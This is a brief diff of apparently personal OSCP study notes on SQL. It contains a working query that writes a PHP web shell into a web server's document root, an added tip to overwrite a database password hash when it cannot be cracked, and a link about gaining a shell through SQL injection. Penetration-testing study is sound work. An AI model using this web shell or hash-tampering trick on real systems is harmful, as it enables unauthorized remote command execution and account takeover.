psyfix/Offensive-Security-Notes/OSCP/Network/SQL.md

 #Insert php shell.
 SELECT '<?php exec($_GET[''cmd'']); ?>' FROM mytable INTO dumpfile ‘/var/www/html/shell.php’

+#If you can't crack the hash inside, try updating the hash instead.

 #More tricks to priv esc or get shell.
 https://security.stackexchange.com/questions/6919/leveraging-a-shell-from-sql-injection
 ```